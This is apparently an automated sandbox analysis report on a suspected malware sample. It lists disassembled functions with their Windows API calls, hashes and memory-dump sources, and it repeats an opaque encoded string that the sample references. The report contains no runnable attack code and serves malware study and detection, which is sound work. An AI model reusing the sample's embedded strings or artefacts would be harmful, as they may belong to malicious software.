Opcode ID: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
Instruction ID: d31693203e36b13fa643c34ed7d2e873ec4fc83637a871ea5abd7a03a4c8c85c
Opcode Fuzzy Hash: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
Instruction Fuzzy Hash: 59F14071E012199FDF14CFA9C8806AEB7B1FF89314F15826EE915A7390DB34AD41CB94

Function 0043D600 Relevance: 3.1, APIs: 2, Instructions: 92COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0043D61E

Part of subcall function 0044C5A0: _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
Part of subcall function 0044C5A0: __FindPESection.LIBCMT ref: 0044C6D1

_CallDestructExceptionObject.LIBVCRUNTIME ref: 0043D6A0

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record
String ID:
API String ID: 4086067019-0
Opcode ID: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
Instruction ID: d36a7cbcb2159855d2e740cbd3865162507ac70638f688864eb4f2737716b515
Opcode Fuzzy Hash: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
Instruction Fuzzy Hash: BC21FC72D01204ABDB14EF69DCC19ABBBA5FF48314F098069ED198B246E734F915CBE4

Function 008BD867 Relevance: 3.1, APIs: 2, Instructions: 92COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 008BD885
_CallDestructExceptionObject.LIBVCRUNTIME ref: 008BD907

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CallDestructExceptionObject___except_validate_context_record
String ID:
API String ID: 3557573858-0
Opcode ID: c239e74d4f3c73cbfb2ec52de4c1c0d13c538d5be237da1c9bce762e36d27d04
Instruction ID: 51a8d7ebd36b14ff6d3aaed1159c1a14c7f1bb951609b5c1c12f82fb3b545c98
Opcode Fuzzy Hash: c239e74d4f3c73cbfb2ec52de4c1c0d13c538d5be237da1c9bce762e36d27d04
Instruction Fuzzy Hash: AD21A272900205ABCB14EF68CC819ABBBA5FF45350F458068E919DB246E731F925CBE1

Function 0044614F Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00418E08,FFFFFFF9,?,?,?,?,00418E08,00000000), ref: 00446164
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00446183

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
Instruction ID: 61ae58f5a109cdc23c8a561ccb435e29d9a033fb164f50c0495edfbe46b21ef4
Opcode Fuzzy Hash: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
Instruction Fuzzy Hash: 00F0F4B1B001147B6B24DF2D880489FBEE9EAC6364726825BE809D3345E574DD05C295

Function 004279E0 Relevance: 3.0, Strings: 2, Instructions: 509COMMON

Download Yara Rule

Strings

y_B>, xrefs: 00427CEA
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 00427E0D, 00427F9F

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$y_B>
API String ID: 0-4284854988
Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
Instruction ID: 4c2ea87e6ed6cce11d3262b2c37c8ab9346d24596443f962e79d9f7238e8cba2
Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
Instruction Fuzzy Hash: E11241B170D361CBDB249F18E49153EBAE4AB94310FA54A5FE0C9CB364D678D8C19B0B

Function 0040136E Relevance: 2.8, Strings: 2, Instructions: 318COMMON

Download Yara Rule

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 004017E7
VUUU, xrefs: 004015EE

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$VUUU
API String ID: 0-3577787444
Opcode ID: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
Instruction ID: 8f7341bf09dd7d88668ef3d11c74458aa2ddba69b727948ac3827fc30a91a2a0
Opcode Fuzzy Hash: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
Instruction Fuzzy Hash: 29C1A7756183019BDB1C8A19C59153EBBE5AB85314F24C93FE15ADB3F4E23CD8419B0B

Function 0041E6F0 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

U, xrefs: 0041EA43
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0041E890, 0041E9DC

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$U
API String ID: 0-800005648
Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
Instruction ID: 920c4e3f9504e8d2d4b163527b25bc307261b88a0300f18b1f19330db72b497f
Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
Instruction Fuzzy Hash: BF91D67D61C3018BDB249B5A84856BEBBE1BF85710F144C1FE9A9CB390D238D8C19B1B

Function 0089E957 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0089EAF7, 0089EC43
U, xrefs: 0089ECAA

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$U
API String ID: 0-800005648
Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
Instruction ID: 0f2a9bfb6da37765d77206c243b55d034d8eb850f002df2f931c5c96a0b65206
Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
Instruction Fuzzy Hash: 9D918E715182459FCF64EB1C84C163DBEE0FB89758F284E2EE0CACA261D235C9859B57

Function 0045D15A Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0045D0B5,?,?,00000008,?,?,0045CC90,00000000), ref: 0045D387

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
Instruction ID: 2e63c45fd147d1bc419a1cf421641fdd954adc511095b72776a1a782a704c190
Opcode Fuzzy Hash: d6540e9e3e2bde8cc81b0ca47ebca29131f08a729fe48da196ffb7867e76fa42
Instruction Fuzzy Hash: EBB15E31A10605CFD724CF28C486B657BA0FF45366F258699EC99CF3A2C339E986CB45

Function 00415070 Relevance: 1.7, Strings: 1, Instructions: 471COMMON

Download Yara Rule

Strings

a, xrefs: 004150D1

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
Instruction ID: 318bea0468e25d50bc193c40de4e6b6217f0263c2ba9fd996b50af1c70fb3ca8
Opcode Fuzzy Hash: abf41055e7df99fb2ef503810f227f4fa87954494fd423e6c9940f4a18d96c89
Instruction Fuzzy Hash: AE121370608740DFD724CF19C980BABBBE2FBC8304F54892EE58987350D779E9858B96

Function 0040D994 Relevance: 1.7, Strings: 1, Instructions: 464COMMON

Download Yara Rule

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0040DDD3, 0040DF76

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK
API String ID: 0-3172509236
Opcode ID: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
Instruction ID: 9c48d330d68db8a76f352aed59f264cc12ac867535c25307469f3d273e047ffe
Opcode Fuzzy Hash: 03cdce923c9e675f9e5ebb5a0dbb8409354af7752ec9be4cef3cf10354fd476d
Instruction Fuzzy Hash: 54F128B1E002098BDF288AA989915BFB6B1AF54310F25493FE015FF3D1E27D89458B5F

Function 008B908F Relevance: 1.7, Strings: 1, Instructions: 417COMMON

Download Yara Rule

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 008B94E1, 008B95B8

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK
API String ID: 0-3172509236
Opcode ID: 268e8702608a6b90ebe5f704738b9a629cec0ea57dbf574d3ec40b0b1ed608f4
Instruction ID: f94476bdebad078e59553a5c27e1be4137a5f55cbb2f37bfa293e5f5f68d97ff
Opcode Fuzzy Hash: 268e8702608a6b90ebe5f704738b9a629cec0ea57dbf574d3ec40b0b1ed608f4
Instruction Fuzzy Hash: 14E1D175D105198BCF28AEAC98915FE7AB0FB04314F34052BE395EB3A1E7358E418B97

Function 00451F08 Relevance: 1.7, APIs: 1, Instructions: 158fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00450330: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
FindClose.KERNEL32(00000000), ref: 004520F4

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Find$File$AllocateCloseFirstHeapNext
String ID:
API String ID: 2963102669-0
Opcode ID: 32231ab2968142434609d1874502abdd1f938d36c1a7161d4ca85e8f4d9ecd2a
Instruction ID: f7a7cccc38e2a98a3a0fd08442e24a40366e03b93faff9898a26c82b853a1aca
Opcode Fuzzy Hash: 32231ab2968142434609d1874502abdd1f938d36c1a7161d4ca85e8f4d9ecd2a
Instruction Fuzzy Hash: 59413A726002096FDB14AF69DC85EBFB36AEF81319F14416BFD0597282EB789D08C658

Function 008D216F Relevance: 1.7, APIs: 1, Instructions: 158fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008D0597: RtlAllocateHeap.NTDLL(00000008,?,008B6A8C), ref: 008D05D8

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008D22BE
FindNextFileW.KERNEL32(00000000,?), ref: 008D2339
FindClose.KERNEL32(00000000), ref: 008D235B

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Find$File$AllocateCloseFirstHeapNext
String ID:
API String ID: 2963102669-0
Opcode ID: 11130e8ba43ef9a754539bc983f7f1652457a0f25efbe84c150eaa5e199ad3f8
Instruction ID: 13eb14a667a92653b54810dd01bc68ef3be64aa25b8c53628d40437c9f18aac8
Opcode Fuzzy Hash: 11130e8ba43ef9a754539bc983f7f1652457a0f25efbe84c150eaa5e199ad3f8
Instruction Fuzzy Hash: A7412676600219AFDB14EEA8DC85EBFB36DFF90314F14426AF915D7340EA30EE048661

Function 0043D0B8 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0043D0CE

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
Instruction ID: 4f8493139679013ee20e08bfcd7abab68794bcc2040eb7ee6f469f72a5842b4a
Opcode Fuzzy Hash: 791a5783c13089c55432eecac0b459280e2b3968fd8be309c5ac16e94238550e
Instruction Fuzzy Hash: E55106B1E002058FEB14CF55E8857ABBBF5FB48310F24947AD415EB354E3B8A980CB99

Function 00414A83 Relevance: 1.6, Strings: 1, Instructions: 352COMMON

Download Yara Rule

Strings

a, xrefs: 00414B2C

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
Instruction ID: 722ab9fffa63a2ef7d1a063d6d10cc189525accf299069018822edd1fef34131
Opcode Fuzzy Hash: 74cedb3eb2f680694ce7935cfb3b67ee33ab9ad9c5e3efc4d66dd220d35ca717
Instruction Fuzzy Hash: 74E125702083419FD724CF19C584BABB7E1BFC8354F05892EF59987250E778E989CB9A

Function 008C12BE Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

0, xrefs: 008C144C

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
Instruction ID: 90f1859ec0c3344caabfb46dcd53ab557836f7d357946633b6f6d8cd7b0d25ab
Opcode Fuzzy Hash: f938d26f7d7b869db53303d6b320227edf2d7df5e48e1cd41f04431b035f6243
Instruction Fuzzy Hash: 38C19970A0064A8ECF28CE68C4D8F6AB7B2FB46318F64461DD446DB793C734E946CB55

Function 0041F916 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: QueryVirtual
String ID:
API String ID: 1804819252-0
Opcode ID: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
Instruction ID: bb654dc0c729bd842e55c2d84f7a994ffa3bbf5d7aaa00ddc59bb9740fabb160
Opcode Fuzzy Hash: adbb045383f3aff83bbbc2894185f14245fc57792bcce1406522dec350c50953
Instruction Fuzzy Hash: C21182731102214BC720DF48CDC0AA773AAFB89718766026AD9445B711D17AECC7C7E4

Function 00424B24 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNEL32(?), ref: 00424B90

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
Instruction ID: 327f04a744b5650a880c0d17b4fb38287b6591765f983e0adcdd5822482b62ae
Opcode Fuzzy Hash: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
Instruction Fuzzy Hash: D1119EB1900B848FD321CF69D845B9AFBF4FB49710F04C62AE8A897740D3786809CFA1

Function 0043CE89 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0003CFB3,0043C903), ref: 0043CE8E

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
Instruction ID: 47f33e16290772828d48e2fc5bbc638760d2d50ec684603df376a2e6b4d14c41
Opcode Fuzzy Hash: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
Instruction Fuzzy Hash:

Function 008BD0F0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0043CFB3,008BCB6A), ref: 008BD0F5

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
Instruction ID: 47f33e16290772828d48e2fc5bbc638760d2d50ec684603df376a2e6b4d14c41
Opcode Fuzzy Hash: f735817a0b308c0274c4987da6a64f0c13ab2f4be108d509050ca7eb575e1a57
Instruction Fuzzy Hash:

Function 004126B9 Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
Instruction ID: b4bf6b1535a8192db109e4eceafa1359732031e4ea1743c163b6d2ec44044536
Opcode Fuzzy Hash: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
Instruction Fuzzy Hash: 5762A1316087418FC715DF29C180AAAB7F1FF88304F14896EE4CA9B351D779E996CB4A

Function 00892920 Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
Instruction ID: 313fd37f47c549046b86a592f2c235832755d890beeea55966aa31732e0a42df
Opcode Fuzzy Hash: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
Instruction Fuzzy Hash: 736259316087459FCB25EF18C480A6AB7F1FF98314F188A6DE4CA9B352D735E946CB42

Function 0041D1E9 Relevance: .5, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e96e1bdeea36fde2e2a7c95cb4fe45291349101a4151a177f093f440f27f0c
Instruction ID: c832cbe4cea19542036e1dfb563506aac7cc4c9f85c134abf1f95b4790773896
Opcode Fuzzy Hash: 18e96e1bdeea36fde2e2a7c95cb4fe45291349101a4151a177f093f440f27f0c
Instruction Fuzzy Hash: 301280B19087408FC324DF28C5816ABB7E2FF95314F144A2ED5D687B91E739E485CB4A

Function 0041204D Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b682a163c1f03396e5c833ff429decc58d3793787ed165ced3494e9022131f5
Instruction ID: 00b37b14bcf7e53a0711464c53c4ad7664543ad39541697e4ede5dfa319fd604
Opcode Fuzzy Hash: 3b682a163c1f03396e5c833ff429decc58d3793787ed165ced3494e9022131f5
Instruction Fuzzy Hash: EB124A75A087059FC714CF29C5806AAFBE1FF88304F14892EE899D7351D778E895CB8A

Function 008922B4 Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4347f92868beb88931f2b4e7c9455e4ea7ed9a5ca3bc03ba5e233bd612ff6f32
Instruction ID: 3025f3e82e4eb5dd92ee75212cd25dbcf57a747dec67663f26880ee5dd97961a
